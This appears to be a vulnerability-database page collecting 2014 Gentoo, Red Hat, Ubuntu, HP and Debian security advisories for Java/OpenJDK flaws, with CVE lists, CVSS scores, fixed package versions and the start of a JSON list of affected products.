[ 13 ] CVE-2014-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458 [ 14 ] CVE-2014-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459 [ 15 ] CVE-2014-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460 [ 16 ] CVE-2014-0461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461 [ 17 ] CVE-2014-0463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463 [ 18 ] CVE-2014-0464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464 [ 19 ] CVE-2014-2397 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397 [ 20 ] CVE-2014-2398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398 [ 21 ] CVE-2014-2401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401 [ 22 ] CVE-2014-2402 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402 [ 23 ] CVE-2014-2403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403 [ 24 ] CVE-2014-2409 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409 [ 25 ] CVE-2014-2410 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410 [ 26 ] CVE-2014-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412 [ 27 ] CVE-2014-2413 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413 [ 28 ] CVE-2014-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414 [ 29 ] CVE-2014-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420 [ 30 ] CVE-2014-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421 [ 31 ] CVE-2014-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422 [ 32 ] CVE-2014-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423 [ 33 ] CVE-2014-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427 [ 34 ] CVE-2014-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428 [ 35 ] CVE-2014-2483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483 [ 36 ] CVE-2014-2490 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490 [ 37 ] CVE-2014-4208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208 [ 38 ] CVE-2014-4209 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209 [ 39 ] CVE-2014-4216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216 [ 40 ] CVE-2014-4218 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218 [ 41 ] CVE-2014-4219 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219 [ 42 ] CVE-2014-4220 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220 [ 43 ] CVE-2014-4221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221 [ 44 ] CVE-2014-4223 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223 [ 45 ] CVE-2014-4227 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227 [ 46 ] CVE-2014-4244 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244 [ 47 ] CVE-2014-4247 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247 [ 48 ] CVE-2014-4252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252 [ 49 ] CVE-2014-4262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262 [ 50 ] CVE-2014-4263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263 [ 51 ] CVE-2014-4264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264 [ 52 ] CVE-2014-4265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265 [ 53 ] CVE-2014-4266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266 [ 54 ] CVE-2014-4268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268 [ 55 ] CVE-2014-4288 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288 [ 56 ] CVE-2014-6456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456 [ 57 ] CVE-2014-6457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457 [ 58 ] CVE-2014-6458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458 [ 59 ] CVE-2014-6466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466 [ 60 ] CVE-2014-6468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468 [ 61 ] CVE-2014-6476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476 [ 62 ] CVE-2014-6485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485 [ 63 ] CVE-2014-6492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492 [ 64 ] CVE-2014-6493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493 [ 65 ] CVE-2014-6502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502 [ 66 ] CVE-2014-6503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503 [ 67 ] CVE-2014-6504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504 [ 68 ] CVE-2014-6506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506 [ 69 ] CVE-2014-6511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511 [ 70 ] CVE-2014-6512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512 [ 71 ] CVE-2014-6513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513 [ 72 ] CVE-2014-6515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515 [ 73 ] CVE-2014-6517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517 [ 74 ] CVE-2014-6519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519 [ 75 ] CVE-2014-6527 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527 [ 76 ] CVE-2014-6531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531 [ 77 ] CVE-2014-6532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532 [ 78 ] CVE-2014-6558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558 [ 79 ] CVE-2014-6562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201502-12.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. Bugs fixed (https://bugzilla.redhat.com/):
1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory) 1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette 1051519 - CVE-2014-0428 OpenJDK: insufficient security checks in IIOP streams (CORBA, 8025767) 1051528 - CVE-2014-0422 OpenJDK: insufficient package access checks in the Naming component (JNDI, 8025758) 1051699 - CVE-2014-0373 OpenJDK: SnmpStatusException handling issues (Serviceability, 7068126) 1051823 - CVE-2013-5878 OpenJDK: null xmlns handling issue (Security, 8025026) 1051911 - CVE-2013-5884 OpenJDK: insufficient security checks in CORBA stub factories (CORBA, 8026193) 1051912 - CVE-2014-0416 OpenJDK: insecure subject principals set handling (JAAS, 8024306) 1051923 - CVE-2014-0376 OpenJDK: document builder missing security checks (JAXP, 8027201, 8025018) 1052915 - CVE-2013-5907 ICU: Layout Engine LookupProcessor insufficient input checks (JDK 2D, 8025034) 1052919 - CVE-2014-0368 OpenJDK: insufficient Socket checkListen checks (Networking, 8011786) 1052942 - CVE-2013-5910 OpenJDK: XML canonicalizer mutable strings passed to untrusted code (Security, 8026417) 1053010 - CVE-2014-0411 OpenJDK: TLS/SSL handshake timing issues (JSSE, 8023069) 1053066 - CVE-2014-0423 OpenJDK: XXE issue in decoder (Beans, 8023245) 1053266 - CVE-2013-5896 OpenJDK: com.sun.corba.se. ============================================================================ Ubuntu Security Notice USN-2191-1 May 01, 2014
openjdk-6 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK 6. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. An attacker could exploit these to expose sensitive data over the network. (CVE-2014-0453, CVE-2014-0460)
A vulnerability was discovered in the OpenJDK JRE related to availability. An attacker could exploit this to cause a denial of service. (CVE-2014-0459)
Jakub Wilk discovered that the OpenJDK JRE incorrectly handled temporary files. A local attacker could possibly use this issue to overwrite arbitrary files. In the default installation of Ubuntu, this should be prevented by the Yama link restrictions. (CVE-2014-1876)
A vulnerability was discovered in the OpenJDK JRE related to data integrity. (CVE-2014-2398)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit this to expose sensitive data over the network. (CVE-2014-2403)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.12.04.2 icedtea-6-jre-jamvm 6b31-1.13.3-1ubuntu1~0.12.04.2 openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.12.04.2 openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.12.04.2 openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.12.04.2 openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.12.04.2
Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.10.04.1 openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.10.04.1 openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.10.04.1 openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.10.04.1 openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.10.04.1
This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any Java applications or applets to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04398922
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04398922 Version: 1
HPSBUX03091 SSRT101667 rev.1 - HP-UX running Java7, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-08-19 Last Updated: 2014-08-19
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities.
References:
CVE-2013-6629
CVE-2013-6954
CVE-2014-0432
CVE-2014-0446
CVE-2014-0448
CVE-2014-0449
CVE-2014-0451
CVE-2014-0452
CVE-2014-0453
CVE-2014-0454
CVE-2014-0455
CVE-2014-0456
CVE-2014-0458
CVE-2014-0459
CVE-2014-0460
CVE-2014-0461
CVE-2014-1876
CVE-2014-2397
CVE-2014-2398
CVE-2014-2401
CVE-2014-2402
CVE-2014-2403
CVE-2014-2409
CVE-2014-2412
CVE-2014-2413
CVE-2014-2414
CVE-2014-2420
CVE-2014-2421
CVE-2014-2422
CVE-2014-2423
CVE-2014-2427
CVE-2014-2428
CVE-2014-2483
CVE-2014-2490
CVE-2014-4208
CVE-2014-4209
CVE-2014-4216
CVE-2014-4218
CVE-2014-4220
CVE-2014-4221
CVE-2014-4223
CVE-2014-4244
CVE-2014-4252
CVE-2014-4262
CVE-2014-4263
CVE-2014-4264
CVE-2014-4265
CVE-2014-4266
CVE-2014-4268
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5 CVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities.
The upgrade is available from the following location: http://www.hp.com/java
OS Version Release Version Depot Name
HP-UX B.11.23, B.11.31 JDK and JRE v7.0.10 or subsequent Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot
MANUAL ACTIONS: Yes - Update For Java v7.0 update to Java v7.0.10 or subsequent
PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk70.JDK70-COM Jdk70.JDK70-DEMO Jdk70.JDK70-IPF32 Jdk70.JDK70-IPF64 Jre70.JRE70-COM Jre70.JRE70-IPF32 Jre70.JRE70-IPF32-HS Jre70.JRE70-IPF64 Jre70.JRE70-IPF64-HS action: install revision 1.7.0.10.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 19 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
For the oldstable distribution (squeeze), these problems have been fixed in version 6b31-1.13.3-1~deb6u1.
For the stable distribution (wheezy), these problems have been fixed in version 6b31-1.13.3-1~deb7u1.
For the testing distribution (jessie), these problems have been fixed in version 6b31-1.13.3-1.
For the unstable distribution (sid), these problems have been fixed in version 6b31-1.13.3-1.
We recommend that you upgrade your openjdk-6 packages
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0374", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jrockit", "scope": "eq", "trust": 2.4, "vendor": "oracle", "version": "r28.3.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "r27.8.1" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.8.0" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.8.0" }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus application server", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus studio", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "operational decision manager", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "8.6" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "1.0" }, { "model": "operational decision manager", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "8.5" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "1.2" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "7.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "2.3" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "7.5" }, { "model": "operational decision manager", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "8.0" }, { "model": "websphere business events", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "junos space", "scope": "lt", "trust": 1.0, "vendor": "juniper", "version": "15.1" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.10" }, { "model": "forms viewer", "scope": "lt", "trust": 1.0, "vendor": "ibm", "version": "4.0.0.3" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "forms viewer", "scope": "gte", "trust": 1.0, "vendor": "ibm", "version": "8.0.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "forms viewer", "scope": "gte", "trust": 1.0, "vendor": "ibm", "version": "4.0.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "13.10" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "10.04" }, { "model": "forms viewer", "scope": "lt", "trust": 1.0, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 